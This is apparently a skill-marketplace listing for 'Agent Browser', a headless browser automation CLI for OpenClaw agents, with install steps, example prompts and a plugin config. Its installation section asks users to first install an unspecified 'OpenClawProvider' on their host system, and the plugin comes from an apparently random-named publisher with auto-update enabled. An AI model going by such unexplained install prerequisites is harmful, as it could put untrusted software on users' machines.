Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
Why use this skill?
Automate web navigation, form filling, and page interaction with Agent Browser. A high-performance Rust-based tool for AI agents.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/sakaen736jih/agent-browser-npzrafdduyrmWhat This Skill Does
Agent Browser is a robust, high-performance headless browser automation tool built in Rust, designed to bridge the gap between AI reasoning and real-world web interactions. It allows your OpenClaw AI agent to behave like a human user by programmatically navigating URLs, inspecting DOM elements, interacting with forms, and scraping data. By leveraging a lightning-fast Rust engine with a Node.js fallback, it ensures that your agent can handle complex single-page applications and legacy sites with ease. The skill translates complex page structures into simplified 'refs' (like @e1), allowing the AI to precisely target interactive components without needing to understand raw HTML.
Installation
Installation is a two-step process to ensure maximum compatibility and performance. First, ensure the OpenClawProvider is installed on your host system as per the specific requirements for your OS (Windows or MacOS). Once the provider is ready, install the agent-browser package via npm globally: npm install -g agent-browser. After installation, run agent-browser install to download necessary browser dependencies. For power users, the tool can also be built from source using pnpm build if customization or local development is required.
Use Cases
- Automated Web Research: Have your agent visit multiple sources, search for specific data points, and compile them into a report.
- Form Automation: Automate repetitive data entry tasks across web portals where traditional APIs are unavailable.
- Testing & QA: Use the agent to verify UI interactions by simulating user clicks, inputs, and navigation flows automatically.
- Dynamic Web Scraping: Interact with sites that require authentication or JavaScript execution that standard scrapers cannot handle.
Example Prompts
- "Open https://www.github.com, find the search bar, type 'OpenClaw', and press Enter. Then, snapshot the results and list the first five repository links found."
- "Go to my dashboard, click the 'Settings' button, locate the email input field using the current page snapshot, and update it to [email protected]."
- "Scroll down the current page by 1000 pixels to trigger lazy loading, then take a new snapshot and find the 'Load More' button."
Tips & Limitations
- Snapshot Strategy: Use
snapshot -ifrequently. It is highly optimized to return only interactive elements, which helps reduce token usage and improves AI focus. - Robustness: After significant DOM changes, such as navigating or triggering modal popups, always perform a fresh snapshot to update your
@refmap. - Limitations: While fast, this tool is headless. Complex animations or sites requiring specific mouse-tracking movements (e.g., canvas-based games) may behave differently than they do in a standard browser. Ensure the OpenClawProvider is kept updated for the best compatibility.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-sakaen736jih-agent-browser-npzrafdduyrm": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
auto-updater
Automatically update Clawdbot and all installed skills once daily. Runs via cron, checks for updates, applies them, and messages the user with a summary of what changed.
Agent Browser
A fast Rust-based headless browser automation CLI with Node.js fallback that enables AI agents to navigate, click, type, and snapshot pages via structured commands.
nano-pdf
Edit PDFs with natural-language instructions using the nano-pdf CLI.
bird
X/Twitter CLI for reading, searching, and posting via cookies or Sweetistics.